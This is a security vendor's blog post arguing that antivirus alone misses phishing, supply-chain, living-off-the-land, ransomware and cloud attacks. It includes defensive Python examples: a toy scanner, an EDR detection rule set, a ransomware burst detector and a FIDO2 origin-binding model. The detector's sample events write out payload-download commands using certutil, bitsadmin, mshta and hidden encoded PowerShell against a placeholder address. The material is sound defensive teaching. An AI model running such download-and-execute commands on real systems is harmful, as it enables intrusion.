Antivirus software was the answer to a 1990s threat model. The threats behind the breaches Sherlock Forensics responds to every week route around antivirus by design. AV catches a meaningful slice of known malware on disk. It does not catch credential-theft phishing pages, supply-chain compromised dependencies, privileged third-party Windows services with missing authorization checks, living-off-the-land techniques that use legitimate Windows binaries, ransomware operators using domain admin credentials, or any of the other categories that account for the majority of modern endpoint compromises. Running antivirus alone in 2026 is necessary minimum hygiene, not adequate protection.
What antivirus actually catches
Antivirus engines do three core things. First, signature scanning matches files on disk against a database of known malicious file hashes and byte patterns. Second, heuristic analysis flags files that exhibit characteristics common to malware (suspicious imports, packing, obfuscation). Third, behavioral monitoring watches running processes for actions that match known malicious behavior patterns (encrypting many files quickly, injecting into other processes, modifying boot configuration).
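As an added illustration (not code from the original page), the three layers as a toy scanner in Python, run over constructed stand-in samples rather than real malware: one "known bad" file, a one-byte variant of it, a packed copy and a benign file. The hash list, byte pattern, entropy cut-off and the toy packer are all assumptions made for the example; they show which layer catches which sample and why a trivial change defeats the hash layer.

```python
import hashlib
import math
import re

# Constructed stand-in samples (not real malware): an MZ header followed by a
# plain-text "dropper body", so the unpacked file has low entropy like most code.
KNOWN_BAD = b"MZ\x90\x00" + b"EVIL_DROPPER_v1 " + b"unpacked dropper body; " * 60
VARIANT = KNOWN_BAD[:-1] + b"!"          # one byte differs: new hash, same family
BENIGN = b"MZ\x90\x00" + b"ordinary, well-behaved program text; " * 40


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for random or packed data, around 4 for text."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def keystream(n: int, seed: bytes) -> bytes:
    """Deterministic pseudo-random bytes (SHA-256 chain) used as the toy packer's key."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def pack(payload: bytes, seed: bytes = b"toy-packer-seed") -> bytes:
    """Toy packer (assumption): keep a 64-byte MZ stub, XOR the rest with a keystream."""
    stub = payload[:4] + b"\x00" * 60
    body = bytes(p ^ k for p, k in zip(payload[4:], keystream(len(payload) - 4, seed)))
    return stub + body


PACKED = pack(KNOWN_BAD)

# The three detection layers the paragraph describes.
HASH_SIGNATURES = {hashlib.sha256(KNOWN_BAD).hexdigest()}   # layer 1: exact file hash
PATTERN_SIGNATURES = [re.compile(rb"EVIL_DROPPER_v\d")]     # layer 1: byte pattern
ENTROPY_THRESHOLD = 7.0   # layer 2 heuristic; assumed "probably packed" cut-off


def scan(data: bytes) -> list[str]:
    findings = []
    if hashlib.sha256(data).hexdigest() in HASH_SIGNATURES:
        findings.append("hash-signature")
    if any(p.search(data) for p in PATTERN_SIGNATURES):
        findings.append("byte-pattern")
    # Heuristic: a PE-looking file whose body is near-random is likely packed/encrypted.
    if data[:2] == b"MZ" and shannon_entropy(data[64:]) > ENTROPY_THRESHOLD:
        findings.append("heuristic:high-entropy-body")
    return findings


def demo() -> dict[str, list[str]]:
    samples = [("known_bad", KNOWN_BAD), ("variant", VARIANT),
               ("packed", PACKED), ("benign", BENIGN)]
    return {name: scan(blob) for name, blob in samples}


if __name__ == "__main__":
    for name, hits in demo().items():
        print(f"{name:10s} -> {hits or 'clean'}")
```

The variant slips past the hash layer and is only caught because the byte pattern survived; the packed copy defeats both signature checks and is only caught by the entropy heuristic, which is exactly the layer that produces false positives on legitimately packed installers. The third layer, behavioral monitoring, needs a running process to watch and is not modelled here; a phishing page or a stolen credential gives none of the three layers anything to look at.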
For commodity malware delivered via traditional vectors (a worm spreading via SMB, a banking trojan dropped from a malicious email attachment, a cryptominer installed by a drive-by exploit kit), modern antivirus catches a high percentage. Independent test labs like AV-TEST and AV-Comparatives publish quarterly detection rates that show major AV products catching 99% or better of known commodity threats. The catch rate is real and the protection is meaningful for that threat class.
The problem is that commodity malware is a shrinking share of the breaches that turn into the ransomware cases Sherlock Forensics handles. The threat classes that dominate modern incidents are largely invisible to antivirus.
What antivirus does not catch
Eight categories of modern endpoint compromise route around antivirus by design.
Credential theft via phishing. A user receives a polished phishing email, clicks the link, lands on a fake login page that looks identical to Microsoft 365 or Google Workspace, and types their password. Antivirus never sees a file. The attacker now has working credentials and logs in as the legitimate user. No AV alert, because no malware exists.
Supply-chain dependency compromise. A developer's project pulls in a compromised npm or PyPI package. The package executes attacker code during install or runtime. The package is legitimately published to the official package registry. AV does not flag it because the file is not malicious by signature. The runtime behavior looks like the developer running their own code.
Privileged third-party Windows services with missing authorization. A regular user account sends a request to a SYSTEM-level service over an interface the vendor already exposes to non-admin users. The service performs the requested action without checking whether the caller is allowed to invoke it, so a standard user gets work done with SYSTEM privilege. The whole interaction is the vendor's own signed software running its own code path, and AV sees nothing malicious. This is the class of weakness the Sherlock EoP Auditor is built to find.
Living-off-the-land techniques. An attacker uses legitimate built-in Windows binaries (powershell.exe, certutil.exe, bitsadmin.exe, mshta.exe) to download files, execute payloads or persist. The binaries are signed by Microsoft and present on every Windows install. AV cannot flag them as malicious without flagging every system administrator as malicious. The technique is invisible to signature-based detection.
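What does catch these techniques is the command line and the parent/child context, which is the telemetry EDR collects and AV does not. The following is an added example (not code from the original page or from Sherlock Forensics) of that detection logic in Python, run over constructed process-creation records in the shape of Windows Security event 4688 (with command-line logging enabled) or Sysmon Event ID 1. The user names, paths, rule names and the 203.0.113.10 TEST-NET address are all constructed; the ATT&CK technique IDs are the real ones for each behaviour.

```python
import re

# Constructed process-creation records (not real telemetry). Each is one new process:
# who ran it, what its parent was, the image path and the full command line.
EVENTS = [
    {"id": 1, "user": r"CORP\jdoe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/up.txt %TEMP%\up.exe"},
    {"id": 2, "user": r"CORP\jdoe", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f http://203.0.113.10/up.txt C:\Users\jdoe\AppData\Local\Temp\up.exe"},
    {"id": 3, "user": r"CORP\jdoe", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta http://203.0.113.10/a.hta"},
    {"id": 4, "user": r"CORP\jdoe", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # the base64 is UTF-16LE "IEX (New-Object" (a constructed fragment)
     "cmdline": r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 5, "user": r"CORP\jdoe", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 /download /priority high http://203.0.113.10/p.bin C:\Users\Public\p.bin"},
    # Two legitimate administrator uses of the same binaries: these must not alert.
    {"id": 6, "user": r"CORP\admin.ops", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -dump C:\certs\corp-root.cer"},
    {"id": 7, "user": r"CORP\admin.ops", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
]

# (rule name, ATT&CK technique, image regex, command-line regex). Every rule keys on the
# combination of a signed Microsoft binary AND an argument pattern, never on a file hash.
RULES = [
    ("certutil download", "T1105", r"\\certutil\.exe$", r"-urlcache\b.*\bhttps?://"),
    ("certutil decode", "T1140", r"\\certutil\.exe$", r"-decode\b"),
    ("bitsadmin transfer", "T1197", r"\\bitsadmin\.exe$", r"/transfer\b.*\bhttps?://"),
    ("mshta remote/inline script", "T1218.005", r"\\mshta\.exe$", r"\b(?:https?|javascript|vbscript):"),
    ("powershell encoded/hidden", "T1059.001", r"\\(?:powershell|pwsh)\.exe$",
     r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}|-w(?:indowstyle)?\s+hidden\b"),
]
OFFICE_PARENT = re.compile(r"\\(?:WINWORD|EXCEL|POWERPNT|OUTLOOK)\.EXE$", re.I)
SHELL_CHILD = re.compile(r"\\(?:cmd|powershell|pwsh|wscript|cscript|mshta)\.exe$", re.I)


def evaluate(events):
    """Return one alert per (event, rule) match; the parent/child rule needs no command line at all."""
    alerts = []
    for ev in events:
        if OFFICE_PARENT.search(ev["parent"]) and SHELL_CHILD.search(ev["image"]):
            alerts.append({"id": ev["id"], "rule": "Office app spawned a shell",
                           "technique": "T1204.002"})
        for name, technique, image_re, cmd_re in RULES:
            if re.search(image_re, ev["image"], re.I) and re.search(cmd_re, ev["cmdline"], re.I):
                alerts.append({"id": ev["id"], "rule": name, "technique": technique})
    return alerts


if __name__ == "__main__":
    for a in evaluate(EVENTS):
        print(f"event {a['id']}: {a['rule']} ({a['technique']})")
```

Events 6 and 7 are the reason AV cannot simply block these binaries: the same certutil.exe and powershell.exe are doing routine administration, and only the argument pattern and parent process separate them from events 2 and 4. Event 1 alerts on context alone (Word launching cmd.exe), before any payload is even fetched, which is the kind of early signal the behavioral layer of AV does not have.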
Ransomware using legitimate credentials. An attacker who has compromised domain admin credentials (often via one of the foothold paths above) deploys ransomware as the administrator. The payload runs with full administrative privilege, in some cases signed with the victim's own code-signing certificate, and encrypts files with standard cryptographic primitives. AV sees a privileged user running a process. Behavioral monitoring sometimes flags the encrypt-many-files-quickly pattern, but only after enough files have been touched to cross its threshold, by which point the damage is well underway.
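The "by then the damage is well underway" point is a property of rate-based behavioral detection, and it is easiest to see with numbers. The following is an added example (not code from the original page or from any vendor's product) of a minimal write-burst detector in Python, run over constructed file-system telemetry: one process rewriting and renaming 200 documents at 25 files per second, and a backup agent copying 300 files in the same window. The paths, process IDs, window size and threshold are assumptions.

```python
from collections import defaultdict, deque
from pathlib import PureWindowsPath


def constructed_events():
    """Constructed file-system telemetry (not real logs)."""
    ev = []
    # pid 4242: an encryptor overwriting each document, then renaming it to *.locked.
    for i in range(200):
        t = 100.0 + i * 0.04                      # 25 files per second
        p = rf"\\fs01\share\docs\report_{i:03d}.docx"
        ev.append({"t": t, "pid": 4242, "op": "write", "path": p})
        ev.append({"t": t + 0.01, "pid": 4242, "op": "rename", "path": p, "new_path": p + ".locked"})
    # pid 777: a backup agent writing 300 copies at 60 files per second, extensions unchanged.
    for i in range(300):
        ev.append({"t": 100.0 + i / 60, "pid": 777, "op": "write",
                   "path": rf"D:\backup\docs\report_{i:03d}.docx"})
    return ev


def extension_changed(ev) -> bool:
    if ev["op"] != "rename":
        return False
    return PureWindowsPath(ev["new_path"]).suffix.lower() != PureWindowsPath(ev["path"]).suffix.lower()


def detect_bursts(events, window_s=5.0, threshold=30, count_plain_writes=False):
    """Alert the first time one pid touches >= threshold distinct files suspiciously
    inside a sliding window. Returns {pid: {"t": alert time, "files_hit": files
    already touched by that pid when the alert fired}}."""
    recent = defaultdict(deque)     # pid -> (t, path) inside the window
    touched = defaultdict(set)      # pid -> every suspicious path so far
    alerts = {}
    for ev in sorted(events, key=lambda e: e["t"]):
        suspicious = extension_changed(ev) or (count_plain_writes and ev["op"] == "write")
        if not suspicious or ev["pid"] in alerts:
            continue
        q = recent[ev["pid"]]
        q.append((ev["t"], ev["path"]))
        while ev["t"] - q[0][0] > window_s:
            q.popleft()
        touched[ev["pid"]].add(ev["path"])
        if len({p for _, p in q}) >= threshold:
            alerts[ev["pid"]] = {"t": ev["t"], "files_hit": len(touched[ev["pid"]])}
    return alerts


if __name__ == "__main__":
    ev = constructed_events()
    print("rename-to-new-extension rule:", detect_bursts(ev))
    print("also counting plain writes:  ", detect_bursts(ev, count_plain_writes=True))
```

With the extension-change rule and a threshold of 30, the encryptor is flagged about 1.2 seconds in, with 30 documents already rewritten; the backup agent never alerts because it renames nothing. Loosen the rule to count plain writes (the tempting fix for encryptors that keep the original extension) and the backup agent alerts first, because it is faster. That trade-off is why the behavioral layer is tuned conservatively in practice and why prevention cannot be the only line: the restore path in the backup section below is what covers the files encrypted before the threshold was crossed.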
Insider threats. An employee with legitimate access exfiltrates data. The user is authorized to read the files. The exfiltration channel is legitimate (email, file sharing service, USB drive). AV has no malicious-file signature to match because no malicious file exists.
Browser-based attacks. An attacker compromises a website the user visits. Malicious JavaScript runs in the browser, exfiltrating session tokens or executing further payloads inside the browser sandbox. The browser process is legitimate, and the script executes from the page rather than from a dropped executable that AV would scan. AV sees nothing.
Cloud account compromises. Many modern attacks never touch the endpoint at all. An attacker compromises a cloud account (M365, Google Workspace, AWS) via stolen credentials or session token theft, then operates entirely in the cloud. The endpoint is healthy. AV has nothing to scan. The damage happens in SaaS infrastructure.
What modern endpoint protection actually requires
Adequate endpoint security in 2026 layers several controls on top of antivirus. Endpoint Detection and Response (EDR) products extend the antivirus model with behavioral telemetry, threat hunting capability and incident response workflow. Major vendors include CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint and Sophos Intercept X. EDR catches a meaningful slice of what AV misses, particularly living-off-the-land techniques and ransomware staging behavior.
Multi-factor authentication on every account closes the credential theft category for most use cases: the phishing page captures the password but cannot complete the MFA step on its own. The caveat is that adversary-in-the-middle phishing kits relay one-time codes and push approvals to the real site in real time, so code-based MFA narrows the window rather than closing it. Phishing-resistant MFA (FIDO2 hardware keys, passkeys) is stronger because the credential is bound to the legitimate site's origin and a relayed login fails; it is also stronger than SMS MFA, which carries the known SIM-swap weakness on top of being relayable.
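Why the origin binding matters is easier to see in code than in prose. The following is an added example (not code from the original page, and not a real WebAuthn implementation) that models the FIDO2 flow in Python with the standard library only: the browser refuses to use a credential outside its RP ID, and even an assertion that somehow got produced on the phishing page carries the phishing origin in the signed client data, so the real site rejects it, whereas a relayed SMS code is accepted. One simplification is labelled in the code: an HMAC key shared with the site stands in for the per-credential key pair. The site names and user name are assumptions.

```python
import base64
import hashlib
import hmac
import json
import secrets


def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def origin_in_scope(origin: str, rp_id: str) -> bool:
    """The browser's check: an https origin may only use credentials whose RP ID is
    its host or a registrable parent domain of that host."""
    if not origin.startswith("https://"):
        return False
    host = origin[len("https://"):].split("/", 1)[0].split(":", 1)[0].lower()
    return host == rp_id or host.endswith("." + rp_id)


class Authenticator:
    """Toy authenticator. Simplification (assumption): one HMAC key per RP ID stands in
    for the per-credential private key, so the site holds the same secret instead of a
    public key. The origin-binding logic is unchanged by that simplification."""
    def __init__(self):
        self.creds = {}

    def register(self, rp_id: str) -> bytes:
        key = secrets.token_bytes(32)
        self.creds[rp_id] = key
        return key

    def get_assertion(self, rp_id, origin, challenge, browser_enforces_scope=True):
        if browser_enforces_scope and not origin_in_scope(origin, rp_id):
            raise PermissionError(f"browser refuses: {origin} is outside RP ID {rp_id}")
        # The browser, not the page, fills in the origin it is actually showing.
        client_data = json.dumps({"type": "webauthn.get", "challenge": b64u(challenge),
                                  "origin": origin}, sort_keys=True).encode()
        tag = hmac.new(self.creds[rp_id], hashlib.sha256(client_data).digest(), hashlib.sha256).digest()
        return client_data, tag


class RelyingParty:
    def __init__(self, rp_id, origin):
        self.rp_id, self.origin = rp_id, origin
        self.keys, self.pending, self.sms_codes = {}, {}, {}

    def start_login(self, user):
        self.pending[user] = secrets.token_bytes(32)
        return self.pending[user]

    def finish_login(self, user, client_data, tag):
        expected = self.pending.pop(user, None)
        cd = json.loads(client_data)
        if expected is None or cd.get("type") != "webauthn.get":
            return False
        if cd.get("challenge") != b64u(expected):
            return False
        if cd.get("origin") != self.origin:     # origin binding: a relayed assertion dies here
            return False
        good = hmac.new(self.keys[user], hashlib.sha256(client_data).digest(), hashlib.sha256).digest()
        return hmac.compare_digest(good, tag)

    def send_sms_code(self, user):
        self.sms_codes[user] = f"{secrets.randbelow(10**6):06d}"
        return self.sms_codes[user]

    def finish_sms(self, user, code):
        return hmac.compare_digest(self.sms_codes.pop(user, ""), code)


def phishing_scenario():
    rp = RelyingParty("corp-sso.example", "https://login.corp-sso.example")   # assumed site
    phish = "https://login.corp-sso-verify.example"                          # assumed attacker site
    auth = Authenticator()
    rp.keys["jdoe"] = auth.register(rp.rp_id)
    out = {}

    c = rp.start_login("jdoe")
    out["direct_login"] = rp.finish_login("jdoe", *auth.get_assertion(rp.rp_id, rp.origin, c))

    c = rp.start_login("jdoe")      # proxy kit fetches the real challenge and shows the phish page
    try:
        auth.get_assertion(rp.rp_id, phish, c)
        out["browser_refuses_phish"] = False
    except PermissionError:
        out["browser_refuses_phish"] = True
        rp.pending.pop("jdoe", None)

    c = rp.start_login("jdoe")      # even with the scope check skipped, clientData names the phish origin
    cd, tag = auth.get_assertion(rp.rp_id, phish, c, browser_enforces_scope=False)
    out["relayed_assertion_accepted"] = rp.finish_login("jdoe", cd, tag)

    code = rp.send_sms_code("jdoe")  # user types the SMS code into the phish page; kit relays it
    out["relayed_sms_accepted"] = rp.finish_sms("jdoe", code)
    return out


if __name__ == "__main__":
    for k, v in phishing_scenario().items():
        print(f"{k:28s} {v}")
```

Nothing in the SMS path ties the six digits to where the user typed them, so the relay works; the FIDO2 path fails twice over, once in the browser and once at the site, because the origin is part of what gets signed. Real WebAuthn uses asymmetric signatures and also checks an RP ID hash and a signature counter, which the toy omits.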
Privileged access management constrains which accounts can perform which actions. Removing local administrator rights from regular user accounts dramatically limits the blast radius when a credential is compromised. The Sherlock Forensics services practice routinely finds that customers who reduced standing admin privilege had much smaller incident scopes than customers who left it broad.
Patch management and configuration baseline enforcement address the third-party software class the EoP Auditor specifically detects. A privileged third-party service running with a known authorization weakness is invisible to AV but addressable through vendor patching, configuration review and surface enumeration.
Logging and detection visibility lets the team see what is happening on the endpoints. The Sherlock Universal Events Viewer reads Windows event logs for incident response and routine triage. Centralized log aggregation (SIEM) ties endpoint events to network and cloud events for cross-source correlation.
Backup and recovery procedures that survive a ransomware event matter more than any specific preventive control. Immutable backups stored offline or in segmented infrastructure are the actual restore path when prevention fails.
What this means for security planning
Running antivirus is necessary minimum hygiene. It catches commodity malware and removes a category of preventable risk. Continue running antivirus.
Running ONLY antivirus is inadequate for any organization handling sensitive data. The modern threat landscape includes too many categories AV cannot see. For small organizations, the practical upgrade path is: deploy EDR (Microsoft Defender for Endpoint is included in several Microsoft 365 business and enterprise plans and is a real EDR product, not renamed AV), enforce MFA everywhere, remove standing local admin privilege, and run a periodic third-party software audit (the Sherlock EoP Auditor automates this for Windows hosts when it releases). For mid-market and larger organizations, the upgrade path adds centralized log aggregation, periodic penetration testing and an incident response retainer.
For incident response when prevention fails, the Sherlock Forensics services practice handles ransomware response, breach investigation and court-defensible forensic examination. The forensic toolchain includes the Sherlock Disk Imager for acquisition with chain of custody, the Sherlock PST Viewer for mailbox forensics during breach analysis and the Universal Events Viewer for timeline reconstruction. Talk to our team about incident response or proactive security assessment.
Source citations
- NIST Cybersecurity Framework 2.0: identifies multiple control categories beyond endpoint protection
- SANS Reading Room: "Why Antivirus Is Not Enough" series and modern endpoint security research
- Verizon Data Breach Investigations Report (DBIR): annual statistics on breach causes and attack vectors
- MITRE ATT&CK Framework: enterprise tactics and techniques documenting what AV cannot detect
- CISA Known Exploited Vulnerabilities catalog: real-world exploitation of categories AV does not address
- AV-TEST and AV-Comparatives quarterly test reports: independent measurement of AV detection rates
Sherlock Forensics responds to breaches on antivirus-protected endpoints every week. Talk to our team about endpoint security assessment, incident response or court-defensible forensic examination.